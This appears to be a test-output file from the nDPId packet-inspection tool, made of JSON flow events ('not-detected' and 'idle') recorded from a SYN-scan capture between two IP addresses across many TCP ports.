+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1070,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9207,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9207,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9207,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9207,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060764,"flow_last_seen":1278275060764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060764,"flow_last_seen":1278275060764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1023,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5120,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1023,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5120,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1026,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1026,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1027,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9220,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9220,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1028,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1027,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 